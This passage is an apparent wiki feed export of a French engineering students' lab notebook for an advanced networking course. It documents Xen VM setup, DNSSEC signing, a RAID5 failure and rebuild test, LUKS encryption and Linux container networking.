    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200 aux eth0 respectifs puis on active vif2 vif 3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46352</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46352"/>
				<updated>2017-11-17T14:11:25Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
